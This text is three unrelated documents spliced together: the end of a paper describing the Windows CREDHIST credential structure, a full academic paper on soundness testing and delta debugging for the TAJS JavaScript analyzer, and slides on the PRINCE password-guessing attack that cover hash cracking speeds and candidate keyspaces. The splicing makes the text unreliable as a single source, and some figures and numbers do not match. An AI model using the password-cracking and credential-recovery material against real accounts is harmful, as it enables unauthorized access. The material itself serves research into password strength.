library/ms995355.aspx , 2001. 1, 3
[9] P. Oechslin. Making a faster cryptanalytic time-
memory trade-off. In Proceedings of CRYPTO 2003 ,
pages 617–630, 2003. 8
[10] Openwall Project. John the ripper password cracker,
2005. http://www.openwall.com/john . 8
[11] Nir Sofer. Nir sofer password recovery tools.
http://www.nirsoft.net/ , 2010. 1
[12] Matt Weir, Sudhir Aggarwal, Bill Glodek, and Breno
de Medeiros. Password cracking using probabilistic
context-free grammars. In proceedings of IEEE Se-
curity and Privacy , 2009. 8
A CREDHIST Structure
The CREDHIST structure looks like this :s t r u c t c r e d h i s t e n t r y s{
D W O R D dwMagic1 ; / / 0 x00000001
D W O R D idHashAlgo ;
D W O R D dwRounds ; / / 0x00000AF0
D W O R D dwCipherAlgo ; / / 0 x00006603
BYTE bSID [ 1 2 ] ;
D W O R D dwComputerSID [ 3 ] ;
D W O R D dwAccountID ;
BYTE bData [ 2 8 ] ;
BYTE bPasswordID [ 1 6 ]
};
Where
•idHashAlgo : is hash function ID.
•dwRounds : similarly to the master key structure, this
is the number of PBKDF2 rounds needed to derive the
key.
•dwCipherAlgo : is the cipher algorithm ID.
•dwDataLength : is the length of the encrypted data.
•dwMACLength : is the length of the HMAC.
•bSID : it seems to be the user SID in a strange format.
•dwComputerSID : is the computer SID.
•dwAccountID : is the account ID.
•bData : contains the encrypted password and the hmac.
•bPasswordID : is the password ID that is also founded
in the master key.
9Systematic Approaches for Increasing
Soundness and Precision of Static Analyzers
Esben Sparre Andreasen
Aarhus University, Denmark
esbena@cs.au.dkAnders Møller
Aarhus University, Denmark
amoeller@cs.au.dkBenjamin Barslev Nielsen
Aarhus University, Denmark
barslev@cs.au.dk
Abstract
Building static analyzers for modern programming languages
is difficult. Often soundness is a requirement, perhaps with
some well-defined exceptions, and precision must be ade-
quate for producing useful results on realistic input programs.
Formally proving such properties of a complex static analysis
implementation is rarely an option in practice, which raises
the challenge of how to identify causes and importance of
soundness and precision problems.
Through a series of examples, we present our experience
with semi-automated methods based on delta debugging and
dynamic analysis for increasing soundness and precision of
a static analyzer for JavaScript. The individual methods are
well known, but to our knowledge rarely used systematically
and in combination.
CCS Concepts•Theory of computation →Program
analysis
Keywords Static Analysis, Soundness, Testing, JavaScript
1. Introduction
Analysis soundness Static analysis of programs written
in mainstream programming languages inevitably involves
approximation. Analysis designers often strive toward sound-
ness, meaning that the analysis should consider every possible
execution of the program being analyzed. Practically all ana-
lyzers deliberately treat some language features unsoundly,
for example regarding reflection or native code [ 11]. How-
ever, unsoundness may also be caused by errors in the design
or the implementation of the analysis. Such errors are easily
overlooked—the analysis may produce a result, quickly and
with good precision, but nevertheless a wrong result. How
can the developer of a static analyzer detect such errors?
One way to ensure soundness is to make a formal proof.
Sometimes this is done for key parts of the analysis design,
c⃝2017 Copyright held by the owner/author(s). Publication rights licensed to ACM.
This is the author’s version of the work. It is posted here for your personal use. Not for redistribution. The definitive
Version of Record was published in SOAP’17 , June 2017, Barcelona.but rarely for the entire analysis, and even more rarely for the
actual implementation. One notable exception is the Verasco
analyzer [ 8], which has been specified and proven sound
using Coq. Despite the relative simplicity of that analyzer,
the proof burden was massive, and the approach is hardly
feasible for static analysis development in general.
Instead of requiring analyzers to be provably sound, we
aim for making them probably sound, which can be achieved
using thorough, automated testing. One such approach is
property-based testing (i.e., quickchecking), which has been
shown in previous work [ 12] to be an effective technique for
detecting errors in static analyzers, by exploiting the generic
algebraic properties of lattices and dataflow constraints. In
this paper, we describe our experience with another pragmatic
technique that we call soundness testing . The idea is simple
and unsurprising: after a program has been analyzed statically,
we compare the analysis results with the concrete states that
are observed by a dynamic analysis of the program. If the
information produced by the static analysis does not over-
approximate the information obtained from the executions, a
soundness error has been detected.
Analysis precision Another important aspect of static
analysis design is precision. As approximation is inevitable
and higher precision generally implies higher worst-case
complexity, the right choice of abstractions can only be
determined experimentally. Analysis precision is usually
measured using some analysis client, for example the ability
to prove absence of certain kinds of errors in the programs
being analyzed. However, internal analysis metrics, such as
sizes of points-to sets or degrees of suspiciousness of abstract
values [ 1] may also provide valuable hints to where it may
be advantageous to improve the analysis abstractions. In this
paper we focus on another technique to investigate analysis
precision problems, which is inspired by the work on blended
analysis [4,16]. A blended analysis is a static analysis that
uses observations from a dynamic analysis to unsoundly
approximate the program behavior. Tuned static analysis [ 10]
is a related technique that uses unsound static pre-analysis
instead of dynamic analysis. The previous work on blended
and tuned analysis is about specific analysis algorithms
that increase precision (by sacrificing soundness), whereas
our goal here is to systematically identify opportunities for
improving an analysis design.
Although our approach is inspired by blended analysis,
it is also related to the recently proposed process called
root-cause localization and remediation [17] for supporting
the design of JavaScript analyses. That process involves a
static analysis that automatically identifies where it looses
precision, and a mechanism for suggesting alternative context
sensitivities for those locations based on dynamic analysis.
Delta debugging In addition to the use of soundness test-
ing and blended analysis, soundness problems and precision
problems are both amenable to delta debugging [18]. This is
an effective technique to reduce the size of inputs (e.g. pro-
grams to be analyzed) while preserving problematic behavior,
which in our case is unsoundness or low precision.
Contributions In this paper we briefly describe our experi-
ence with soundness testing and blended analysis as methods
for increasing soundness and precision of the TAJS [ 1,7]
static analyzer for JavaScript. Both of these techniques rely
on information recorded by the same dynamic analysis. We
have used both soundness testing and blended analysis in
combination with delta debugging to identify causes and im-
portance of soundness and precision problems. The methods
are semi-automated and tightly integrated into the TAJS in-
frastructure, and they have become essential tools for guiding
our continuous development of the analyzer.
TAJS We believe the techniques we present are broadly
applicable to static analysis development in general, but we
here focus on the TAJS analyzer.1In brief, TAJS is a whole-
program dataflow analyzer for JavaScript, aiming to infer
type-related properties involving the flow of primitive values,
objects, and functions in the programs being analyzed. It
supports most ECMAScript 5 features, including the native
library and large parts of modern browser API and HTML
DOM functionality.
Regarding soundness, we face several challenges. The
language itself is extremely complex, there is a substantial
native library specified in the ECMAScript standard, and the
browser API and HTML DOM are not only massive but also
poorly documented and constantly evolving. Tiny errors in
the models can easily cause serious soundness issues that
may affect validity of experimental results if not detected.
Regarding precision, we (and many others) have found
that some programming patterns that are common in widely
used JavaScript libraries require extraordinary analysis pre-
cision, and that inadequate precision often renders even
small programs unanalyzable due to avalanches of spuri-
ous dataflow [ 1,9,10,14,17]. Here, “unanalyzable” means,
for example, that the analysis (spuriously) finds that eval is
called with an unknown string as argument.
2. Basic Techniques
In this section we briefly describe the three basic techniques
with examples of how we have used them in our ongoing
development of TAJS.
1TAJS is available at http://www.brics.dk/TAJS/ .1var a, b, x;
2a = {p: 0, q: 0};
3b = [];
4for (var p in a)
5 b.push(p);
6x = b[0]
7a[x] = b[x];
8a.p();
(a) Reduced program for 5
versions of underscore.js.1var a, x;
2a = {};
3a.p = 0;
4b.q = 0;
5for (var i = 0; i++) {
6 x = Object.keys(a)[i];
7 this[x] = a[x];
8}
(b) Reduced program for 11
versions of lodash.js.
Figure 1: Delta debugging precision problems.
2.1 Delta Debugging
Delta debugging [ 18] is a technique for automated debugging
of programs. The essence of the technique is that a large in-
put is reduced systematically while preserving some specific
buggy behavior. The output is valuable because it makes it
easier to understand whythe buggy behavior arises. A delta
debugging session takes two inputs: (1) an input program to
reduce, and (2) a predicate that determines if the (reduced)
program exhibits some specific behavior. The output is a
smaller program exhibiting this behavior. We will use the
term “delta debugging” throughout this text, although a more
appropriate name is the generalized concept of “cause reduc-
tion” [ 6]. The difference is that we are using the technique to
identify causes of a wide range of analysis behaviors, and not
just buggy behaviors.
Example While further developing our static determinacy
analysis technique [ 1], we observed that several utility li-
braries2, each consisting of thousands lines of code, were
unanalyzable. To investigate whether the libraries contained
common patterns that were problematic for TAJS to ana-
lyze, we applied delta debugging using the predicate that
TAJS should not be able to analyze the library within 5 min-
utes. Manually inspecting the outputs that were produced
for the different versions of the libraries quickly revealed
a small, common pattern for each library. Figure 1a shows
the resulting reduced program that was common to all five
different versions of the underscore.js library. The manage-
able size (only 8 lines) made it possible to determine the root
cause of the critical precision loss: The entries of an array are
mixed together since the iteration order of for-inloops is
implementation-specific according to the ECMAScript stan-
dard. The lost precision eventually causes spurious dataflow
to a large number of native functions at the method call in
line 8. A similar reduced program for a common pattern in
11 versions of the lodash.js library can be seen in Figure 1b.
Delta debugging in practice The JavaScript delta debug-
ger JSDelta3has been used by several JavaScript research
groups. JSDelta systematically simplifies a JavaScript pro-
gram by performing statement deletion, sub-expression sim-
plification, and general purpose program optimizations, such
as function inlining.
2http://underscorejs.org/ ,https://lodash.com/ , among others
3https://github.com/wala/jsdelta
JSDelta is integrated with TAJS through a simple Java in-
terface. To start delta debugging, a predicate is implemented
in5–10lines of Java code, and the delta debugging main
method is executed through the IDE with the predicate and
some input program. This often reduces a few thousand lines
of code to less than 20within a few hours, fully automati-
cally. The integration through Java also enables highly spe-
cialized predicates. As an example, a specialized predicate
has been used to understand surprising differences between
two slightly different analysis configurations. This predicate
was defined to determine whether one configuration would
lead to a particular kind of flow graph node being processed
significantly more often than with the other configuration.
Although a delta debugger in principle can produce output
that contains problems that are not present in the input, we
have found that situation to be rare. In practice, the output
usually exhibits the problem that was also present in the input,
which makes the approach useful for understanding analysis
limitations.
2.2 Soundness Testing
We use the term soundness testing to denote the process
of checking whether observations in a concrete execution
of a program are subsumed by the results computed by the
static analysis. Soundness testing has been applied in various
ways to many static analyzers. A notable example of this is a
study of the consequences of deliberate unsoundness in the
Clousot analyzer [3]. An interesting conclusion in that work
is that Clousot often encounters unsoundness in practice but
nevertheless rarely misses alarms.
Value logging An important design choice when perform-
ing soundness testing is deciding what information to include
from the dynamic executions. We have chosen a simple ap-
proach based on value logs , which consist of the values of
expressions that are computed during the execution of a pro-
gram. Other options include recording the call graph [ 17],
statement traces [ 16], or state snapshots [ 5,13]. We have
found the simpler value logs sufficient for our purposes.
An example program and (a simplified version of) its value
log produced by our tool can be seen in Figure 2. The property
access on line 2 of the program is represented by the first two
lines of the value log. It has been logged that the property
access occurred on the object allocated at position 1:8in the
program ( BASE ), and that the result is the string “ foo,bar ”
(PROP ). Similarly, the call to split on line 3, is represented
by the three last lines of the value log.
A notable design choice for our value logs is that we ab-
stract away from execution order. This allows us to eliminate
duplicate entries, which leads to a considerable reduction of
the sizes of the logs.
Another important choice is that the value logs do not
contain information about call stacks or scope chains of
function objects. As mentioned, TAJS is partly context-
sensitive, but it is extremely difficult to implement a faithful
mapping from, for example, runtime call stacks to the abstract1var o = { p: ’foo,bar’ };
2var s = o.p;
3var a = s.split(’,’);
f.js:2:9 BASE OBJECT (f.js:1:8)
f.js:2.9 PROP STRING ("foo,bar")
f.js:3:9 BASE STRING ("foo,bar")
f.js:3:9 CALLEE BUILTIN (String .prototype.split)
f.js:3:9 ARG0 STRING (",")
Figure 2: A program (top) and its value log (bottom).
notion of contexts used by the static analysis. This means
that when checking subsumption of the concrete values and
the abstract values, we can only report a soundness error if a
given concrete value is not subsumed by the corresponding
abstract values for allcontexts.
Value logging in practice We obtain value logs with
a dynamic analysis implemented using Jalangi [ 15]. The
program of interest is instrumented and executed such that
observations about runtime values are recorded. When the
execution ends, the observations are post-processed into a
value log, which is then persisted for reuse. The value log also
contains metadata, for example a checksum of the program
code so that we can easily detect if the program has been
modified and the value log should be recreated.
The logging mechanism also supports different envi-
ronments, enabling the creation of value logs for plain
ECMAScript applications, Node.js applications, and browser-
based applications. For example, if a log file is missing for a
browser-based application, a browser is spawned to load the
instrumented application, making it easy to manually interact
with it and decide when to stop recording.
Example As an example of a failing soundness test, con-
sider the code and the value log in Figure 2. If the analysis is
missing a model for the split property of string objects, then
our soundness testing tool fails with the following report:
Soundness testing failed for 1/5 checks :
- CALLEE on program line 3:
- concrete : BUILTIN ( String . prototype . split )
- abstract : { undefined }
In this case, it is easy for the analysis designer to spot and
fix the root cause of the unsoundness. All that is needed is a
model of the built-in function String.prototype.split .
Soundness errors can easily spread in less obvious ways: a
missing assignment to a field can cause the soundness check
of the subsequent reads of that field to fail because of an
unsound value rather than missing dataflow. Such extraneous
soundness errors can make it harder to deduce the root cause
of unsoundness. Furthermore, there may be multiple root
causes of a failing soundness test, which can also make it
harder to identify a single one of them. In Section 3.1 we
present a technique for remedying these situations.
Soundness testing in practice Soundness testing is inte-
grated into TAJS’ regression test system and has been suc-
cessful in uncovering many subtle soundness bugs. Initially,
we found bugs in the core parts of the analysis, but recently
mostly in the models of the huge, complex, and constantly
evolving native libraries. For this reason we are planning to
apply deeper checks of values originating from the native
libraries, for example, not just checking that a value expected
to be an object (rather than a primitive value) really is an
object, but also that the object has the right properties.
Soundness errors sometimes result in highly inaccurate
analysis results, which may be difficult to notice without
soundness testing. However, as also observed by Christakis
et al.[3], unsoundness can be benign, in the sense that it
sometimes influences only a few nearby statements and not
the remainder of the program, nor the analysis output.
In TAJS, we maintain a catalog of known soundness errors,
which are then ignored when running the soundness tests.
Most of these known errors have been added to the catalog
because they have been classified as benign. This catalog
helps to document the unsoundness in TAJS, as advocated
by the soundiness manifesto [ 11]. It also helps prioritizing
which soundness errors to fix.
At the time of writing, the main regression test suite
of TAJS contains approximately 2 200 successfully sound-
ness tested JavaScript programs, comprising 900 000 individ-
ual soundness checks for 100 000 syntactic locations. Only
around 100of the soundness checks fail, due to around 20
different soundness bugs that are caused by, for example,
inadequate modeling of the HTML DOM.
2.3 Blended Analysis
An easy way to increase the precision of a static analysis
is to replace parts of the abstract states with concrete states
obtained by a dynamic analysis. While this is obviously not
sound in general, it is sound relative to the execution path
taken by the dynamic analysis.
The idea is not new. Blended analysis [ 4,16] for Java and
JavaScript allows the analysis to follow the control flow of
the concrete execution. The TamiFlex tool [ 2] uses the same
approach to handle Java reflection. Dynamic determinacy
analysis [ 14] for JavaScript is based on a similar idea but
retains soundness by only using dynamic information that is
valid for all executions.
We apply this technique by leveraging the value logs
that we already have from soundness testing as described
in Section 2.2. When analyzing a program, the associated
value log can be queried for the concrete values at a program
location. The abstract value for that program location can then
be refined by intersecting (technically, applying the greatest
lower bound) with the abstraction of the concrete values.
Another option would be to replace the abstract value with
the abstraction of the concrete values, but since the value
logs do not record any control flow information, that would
generally be less precise.
In practice, our value logs are more detailed than presented
in Section 2.2. We record some relational information, for
example, at a property write, we log the base object, the1var message = x == y ? "Same" : "Different";
2var code = "print(’" + message + "’)";
3eval(code);
f.js:3:1 ARG0 STRING ("print(’Same’)")
Figure 3: A program with eval and a line from its value log.
property value, and the value to be written. Thereby, when
refining, for example, the abstract value being written, we
can ignore concrete values that apply to other abstract objects
and other property values, which increases precision.
Example As a TamiFlex-like example, a static analysis
for JavaScript can use blended analysis for the argument to
eval .4Consider the program and its associated value log in
Figure 3. Without having support for determining that the
variables xandyalways have the same value, the analysis is
able to evaluate the eval call as the code print(’Same’) .
A similar use of blended analysis that enables focused
prototype analysis design is to obtain call and points-to graphs
from the value log instead of approximating them soundly.
Blended analysis in practice The use of blended analysis
makes it possible to circumvent challenging language or
library features, allowing the analysis designer to proceed
with other aspects of the analysis.
We mostly use blended analysis in combination with other
techniques, as we describe in Sections 3.2 to 3.4. However,
we have also used the approach to investigate “best-case
scenarios” for analyzing large JavaScript applications that
are beyond reach of all existing sound JavaScript analyzers.
By applying blended analysis aggressively—at allprogram
locations—we can test the analyzer for fundamental scalabil-
ity problems and logical implementation errors. Any errors
that are detected in such a scenario also exist without enabling
blended analysis but may be more difficult to find without it.
3. Combining the Basic Techniques
The basic techniques introduced in the previous section can
be combined to create some particularly powerful techniques
that guide the design of static analyses.
3.1 Soundness Testing and Delta Debugging
As stated in Section 2.2, soundness testing can expose sound-
ness bugs, but it is often difficult to locate the cause of a
failing soundness test if the program being analyzed is large
or if the bug causes many soundness checks to fail. Delta
debugging is extremely useful in these cases. Each iteration
of this delta debugging process works as follows. (1) run
the program concretely to obtain a value log, (2) analyze the
program, (3) perform soundness testing of the result from
step 2 using the value log from step 1. The delta debugging
predicate is that step 3 results in one or more failing sound-
ness checks. Delta debugging then automatically produces a
small program containing a soundness error.
4We note that TAJS is able to handle some common occurrences of eval .
1var i, s;
2i = "0";
3s = i++;Soundness testing failed :
- VAR ’s’ on program line 3:
- concrete : NUMBER (0)
- abstract : { STRING ("0") }
Figure 4: Reduced program with a subtle soundness error.
If one wants to target a specific soundness error, then the
predicate can be refined to consider only that particular error.
Nevertheless, any reduced program with a soundness error is
valuable even after the error has been fixed, since their small
sizes make them useful as fast regression tests.
Example Figure 4 shows a reduced version of an un-
soundly analyzed program, together with the failing sound-
ness test. This small program was produced starting from a
large program that at that time had thousands of soundness
failures. The reduced program exposed that the value of a
postfix expression in JavaScript is, perhaps surprisingly, the
number-coerced value and not the original value. In this exam-
ple, it turned out that the exposed soundness bug was benign,
and after fixing it the original program still had thousands of
soundness failures. However, repeating the process quickly
revealed that those failures all had the same root cause and
could also easily be fixed.
3.2 Soundness Testing and Blended Analysis
By combining soundness testing and blended analysis, it is
possible to detect soundness errors even in programs that are
unanalyzable (in the sense described in Section 1) when using
the ordinary analysis! Using the same dynamic information
for the two purposes, any failures that are detected during the
soundness testing must be due to unsoundness in the analysis,
andnotdue to the under-approximation introduced by the
use of blended analysis.
Example Consider the soundness error below:
Soundness testing failed for 43/3932 checks :
- PROP on program line 542:
- concrete : BUILTIN ( Symbol . unscopables )
- abstract : { undefined }
It reveals that the program being analyzed uses the Symbol
ECMAScript 6 feature, which was not yet fully modeled in
TAJS at the time this test was run. Without the use of blended
analysis, the program was unanalyzable due to inadequate
analysis precision, and it would have been difficult to tell that
the feature was not just encountered due to spurious dataflow.
3.3 Delta Debugging and Blended Analysis
We can also combine delta debugging and blended analysis.
This time, delta debugging is not instantiated with a program,
but instead with a set of program locations where blended
analysis is allowed. This combination of techniques gives
a way of finding a minimal set of locations that need to be
handled precisely by the static analysis.
Delta debugging is initiated with the set of all locations1_.mixin = function(obj) {
2 _.each(_.functions(obj), function(name) {
3 var func = _[name] = obj[name];
4 _.prototype[name] = function() {
5 func.apply(_, arguments);
6 };});};
7_.mixin(_);
Figure 5: Excerpt from problematic underscore.js code.
in the program to be analyzed and the predicate that TAJS
can analyze the program, for example within one minute, by
applying blended analysis in the current set of locations. The
outcome is a reduced set of locations where blended analysis
is critical. Manually inspecting those locations often gives
good hints for improving the analysis design.
We find that the resulting number of locations is usually
below 5, which supports the claim that few root causes of
imprecision can render the analysis result useless [17].
Examples Using this technique to investigate causes of
precision problems when analyzing various small applica-
tions of the underscore.js library resulted in the following
automatically generated report.
underscore -1.8.3. js needs more precision at:
- PROPERTY WRITE at line 3
The relevant piece of code is shown in Figure 5 (line numbers
have been modified to match the figure). Blended analysis
was only needed in a single location, which means that
improving TAJS to be able to handle this particular location
precisely was the key to analyze the entire program. TAJS’
problem with underscore.js was that the abstract value of
name was an unknown string, so each property of objwas
conservatively written to each property of the library object,
thereby introducing a critical loss of precision.
Further in our investigation involving a more complicated
application of the library, we got this report:
underscore -1.8.3. js needs more precision at:
- PROPERTY WRITE at line 3
- CALL at line 5
This time, one additional location needed more precision.
The problem was that func could be every element in obj,
which would cause TAJS to conservativly model calls to every
function of obj, making the program unanalyzable.
Using this technique to systematically investigate preci-
sion problems with a range of applications of the library, we
obtained an overview of the various precision bottlenecks,
which was useful for prioritizing our effort and designing
useful improvements of the analysis abstractions.
3.4 Combining All Three Techniques
As discussed in Section 3.2, combining blended analysis and
soundness testing makes it possible to detect soundness errors
even with programs that cannot be analyzed by TAJS. It is
not always easy to identify the root cause of such a soundness
error, but again we can make use of delta debugging to
automatically produce a small program that is analyzed
1function f(){
2 return arguments;
3}
4f().p;Soundness testing failed :
- PROP on program line 4:
- concrete : UNDEFINED
- abstract : {}
Figure 6: Identifying the cause of unsoundness from an
unanalyzable program.
unsoundly. Compared to the combination of soundness testing
and delta debugging described in Section 3.1, we now use the
value log that is created in each delta debugging step both for
soundness testing and for blended analysis.
Example As mentioned in Section 3.3, TAJS could not an-
alyze simple applications of the underscore.js library, mean-
ing that without blended analysis, we could not use those
JavaScript programs to detect soundness errors. By combin-
ing the three techniques we not only detected a soundness
error, but we also obtained a reduced program containing
the error. The reduced program and the soundness test re-
port are shown in Figure 6. It turned out that the analysis
did not properly support accessing properties of the special
arguments object outside of its declaring function. The re-
duced program made it easy to locate the cause. The single
fix reduced thousands of failing soundness checks to zero,
since the soundness error influenced the dataflow in the rest
of the program.
4. Conclusion
We have presented our experience with soundness testing,
blended analysis, and delta debugging for systematically
guiding improvements of soundness and precision of the
TAJS static analyzer. Both soundness testing and blended
analysis build on top of value logs obtained by dynamic
analysis. Other useful techniques, such as quickchecking and
suspiciousness metrics, are described elsewhere [1, 12],
Our experience can be summarized as the following
recommendations to static analysis developers:
•Use dynamic analysis to record value logs for all bench-
mark programs. The value logs are useful for improving
both soundness and precision as the analysis design and
implementation evolves.
•Use soundness testing as an integrated part of the develop-
ment, and maintain a catalog of known soundness issues.
When soundness errors appear, use delta debugging to
quickly identify the cause.
•When precision problems appear, use blended analysis
to investigate how alternative analysis abstractions may
help. Combining blended analysis with delta debugging
can often automatically locate the critical places where
extra precision is needed.
•By combining soundness testing, blended analysis, and
delta debugging, it is possible to quickly identify sound-
ness errors even for programs that are unanalyzable due
to insufficient analysis precision.Acknowledgments
This work was supported by the European Research Council
(ERC) under the European Union’s Horizon 2020 research
and innovation program (grant agreement No 647544).
References
[1]Esben Andreasen and Anders Møller. 2014. Determinacy in
static analysis for jQuery. In OOPSLA .
[2]Eric Bodden, Andreas Sewe, Jan Sinschek, Hela Oueslati, and
Mira Mezini. 2011. Taming reflection: aiding static analysis in
the presence of reflection and custom class loaders. In ICSE .
[3]Maria Christakis, Peter Müller, and Valentin Wüstholz. 2015.
An experimental evaluation of deliberate unsoundness in a
static program analyzer. In VMCAI .
[4]Bruno Dufour, Barbara G. Ryder, and Gary Sevitsky. 2007.
Blended analysis for performance understanding of framework-
based applications. In ISSTA .
[5]Asger Feldthaus and Anders Møller. 2014. Checking cor-
rectness of TypeScript interfaces for JavaScript libraries. In
OOPSLA .
[6]Alex Groce, Mohammad Amin Alipour, Chaoqiang Zhang,
Yang Chen, and John Regehr. 2016. Cause reduction: delta
debugging, even without bugs. STVR (2016).
[7]Simon Holm Jensen, Anders Møller, and Peter Thiemann. 2009.
Type analysis for JavaScript. In SAS.
[8]Jacques-Henri Jourdan, Vincent Laporte, Sandrine Blazy,
Xavier Leroy, and David Pichardie. 2015. A formally-verified
C static analyzer. In POPL .
[9]Vineeth Kashyap, Kyle Dewey, Ethan A. Kuefner, John Wag-
ner, Kevin Gibbons, John Sarracino, Ben Wiedermann, and
Ben Hardekopf. 2014. JSAI: a static analysis platform for
JavaScript. In ESEC/FSE .
[10] Yoonseok Ko, Hongki Lee, Julian Dolby, and Sukyoung Ryu.
2015. Practically tunable static analysis framework for large-
scale JavaScript applications. In ASE.
[11] Benjamin Livshits, Manu Sridharan, Yannis Smaragdakis,
Ondrej Lhoták, José Nelson Amaral, Bor-Yuh Evan Chang,
Samuel Z. Guyer, Uday P. Khedker, Anders Møller, and
Dimitrios Vardoulakis. 2015. In defense of soundiness: a
manifesto. Commun. ACM (2015).
[12] Jan Midtgaard and Anders Møller. 2015. Quickchecking static
analysis properties. In ICST .
[13] Joonyoung Park, Inho Lim, and Sukyoung Ryu. 2016. Bat-
tles with false positives in static analysis of JavaScript web
applications in the wild. In ICSE SEIP .
[14] Max Schäfer, Manu Sridharan, Julian Dolby, and Frank Tip.
2013. Dynamic determinacy analysis. In PLDI .
[15] Koushik Sen, Swaroop Kalasapur, Tasneem G. Brutch, and
Simon Gibbs. 2013. Jalangi: a selective record-replay and
dynamic analysis framework for JavaScript. In ESEC/FSE .
[16] Shiyi Wei and Barbara G. Ryder. 2013. Practical blended taint
analysis for JavaScript. In ISSTA .
[17] Shiyi Wei, Omer Tripp, Barbara G. Ryder, and Julian Dolby.
2016. Revamping JavaScript static analysis via localization
and remediation of root causes of imprecision. In ESEC/FSE .
[18] Andreas Zeller and Ralf Hildebrandt. 2002. Simplifying and
isolating failure-inducing input. STE (2002).PRINCE
modern password guessing algorithm
FUTURE OF PASSWORD HASHESWhy do we need a new attack -mode?
Jens Steube -PRINCE algorithm 08.12.2014 2
Future of modern password hashes
Feature
•High iteration count 
•Salted 
•Memory -intensive 
•Configurable parameters
•Anti-Parallelization
•...Effect
•Slow
•Rainbow -Tables resistance
•GPU resistance
•Slow
•Slow
08.12.2014 Jens Steube -PRINCE algorithm 3
Algorithms used for password hashing, 
by performance*
Name Speed
NTLM, MD5, SHA1 -512, Raw -Hashes 1 BH/s -10 BH/s
Custom (Salt): VBull , IPB, MyBB 100 MH/s -1 BH/s
DEScrypt 10 MH/s -100 Mh/s
MD5crypt 1 MH -10 MH/s
TrueCrypt, WPA/WPA2 (PBKDF2) 100kH/s -1 MH/s
SHA512crypt, Bcrypt (Linux/Unix) 10kH/s -100 kH/s
Custom (Iteration): Office, PDF, OSX 1kH/s -10 kH/s
Scrypt  (RAM intensive): Android 4.4+ FDE < 1 kH/s
* Performance oclHashcat v1.32
Single GPU
Default settings forconfigurable algorithms
Jens Steube -PRINCE algorithm 08.12.2014 4
Effects of modern password hashes
•Obsolete attack -modes:
–Brute -Force -attack
–Rainbow -Tables
Jens Steube -PRINCE algorithm 08.12.2014 5
REMAINING ATTACK VECTORSSo, what can the attacker do?
Jens Steube -PRINCE algorithm 08.12.2014 6
Remaining attack vectors
•Hardware (FPGA/ASIC)
•Extract keys from RAM
•Efficiency
08.12.2014 Jens Steube -PRINCE algorithm 7
Remaining attack vectors
•Hardware (FPGA/ASIC)
•Extract keys from RAM
•Efficiency•Easier to cool
•Lower power 
consumption
•Easier tocluster
•Clustering only linear
•Expensive development
•Unflexible?
08.12.2014 Jens Steube -PRINCE algorithm 8
Remaining attack vectors
•Hardware (FPGA/ASIC)
•Extract keys from RAM
•Efficiency•Highest chance of
success
•Requires physical access 
to the System
•System must run
08.12.2014 Jens Steube -PRINCE algorithm 9
Remaining attack vectors
•Hardware (FPGA/ASIC)
•Extract keys from RAM
•Efficiency•Exploit human 
weakness :
–Psychology aspects
–Password reuse
–Pattern
•Limited keyspace
•Using rules:
–Limited pattern
–Takes time to develop
08.12.2014 Jens Steube -PRINCE algorithm 10
PRINCE ATTACKFeatures and advantages compared to previous attack modes
Jens Steube -PRINCE algorithm 08.12.2014 11
Advantages over other Attack -Modes
•Simple to use, by design
•Smooth transition
•Makes use of unused 
optimizations:
–Time works for attacker
–Personal aspects
08.12.2014 Jens Steube -PRINCE algorithm 12
Advantages over other Attack -Modes
•Simple to use, by design
•Smooth transition
•Makes use of unused 
optimizations:
–Time works for attacker
–Personal aspects•No monitoring required
•No extension required
•No syntax required
08.12.2014 Jens Steube -PRINCE algorithm 13
Advantages over other Attack -Modes
•Simple to use, by design
•Smooth transition
•Makes use of unused 
optimizations:
–Time works for attacker
–Personal aspects•Primary goal of the 
algorithm
•Starts with highest 
efficiency
–Wordlist 
–Hybrid
–Keyboard walks / 
Passphrases
–Brute -Force + Markov
•Not a scripted batch
08.12.2014 Jens Steube -PRINCE algorithm 14
Advantages over other Attack -Modes
•Simple to use, by design
•Smooth transition
•Makes use of unused 
optimizations:
–Time works for attacker
–Personal aspects•Does not run out of 
(good) wordlists
–Time -consuming 
monitoring
•Does not need ideas
–Time -consuming 
extension
08.12.2014 Jens Steube -PRINCE algorithm 15
Advantages over other Attack -Modes
•Simple to use, by design
•Smooth transition
•Makes use of unused 
optimizations:
–Time works for attacker
–Personal aspects•Personal Aspects
–Religion
–Political wing
–Red car
•Not hobbies, friends, 
dates, ...
–Already covered with 
Wordlist -Attack
–Common knowledge not 
to use them
08.12.2014 Jens Steube -PRINCE algorithm 16
PRINCE ATTACKAlgorithm details
Jens Steube -PRINCE algorithm 08.12.2014 17
PRINCE -attack
•PRobability
•INfinite
•Chained
•Elements
Jens Steube -PRINCE algorithm 08.12.2014 18
Attack basic components
•Element
•Chain
•Keyspace
08.12.2014 Jens Steube -PRINCE algorithm 19
Attack basic components
•Element
•Chain
•Keyspace•Smallest entity
•An unmodified line 
(word) of your wordlist
•No splitting / 
modification of the line
•Sorted by their length 
into element database
08.12.2014 Jens Steube -PRINCE algorithm 20
Element example
•123456
•password
•1
•qwerty
•...•Table: 6
•Table: 8
•Table: 1
•Table: 6
•...
08.12.2014 Jens Steube -PRINCE algorithm 21
Attack basic components
•Element
•Chain
•Keyspace•Sum of all elements 
lengths in a chain = 
chain output length
•Fixed output length
•Best view on this is in 
reverse order, eg. a 
chain of length 8 can 
not hold an element of 
length 9
08.12.2014 Jens Steube -PRINCE algorithm 22
Chains example, general
•Chains of output length 8 consists of the 
elements
•8
•2 + 6
•3 + 5
•...
•1 + 1 + 1 + 1 + 1 + 1 + 1 + 1
•Number of chains per length = 2 ^ ( length -1)
Jens Steube -PRINCE algorithm 08.12.2014 23
Attack basic components
•Element
•Chain
•Keyspace•Number of candidates 
that is getting 
produced, per chain
•Different for each chain
•The product of the 
count of the elements 
which build the chain
08.12.2014 Jens Steube -PRINCE algorithm 24
Element example (rockyou)
•length 1: 45
•length 2: 335
•length 3: 2461
•length 4: 17899
•...
08.12.2014 Jens Steube -PRINCE algorithm 25
Keyspaces of chains of length 4 
(rockyou)
Chain Elements Keyspace
4 17,899 17,899
1 + 1 + 1 + 1 45 *  45 *  45 *  45 4,100,625
1 + 1 + 2 45 *  45 * 335 678,375
1 + 2 + 1 45 * 335 *  45 678,375
1 + 3 45 * 335 15,075
2 + 1 + 1 335 *  45 *  45 678,375
2 + 2 335 * 335 112,225
3 + 1 335 *  45 15,075
08.12.2014 Jens Steube -PRINCE algorithm 26
Keyspaces of chains of length 4 
(rockyou)
Chain Elements Keyspace
3 + 1 335 *  45 15,075
1 + 3 45 * 335 15,075
4 17,899 17,899
2 + 2 335 * 335 112,225
2 + 1 + 1 335 *  45 *  45 678,375
1 + 2 + 1 45 * 335 *  45 678,375
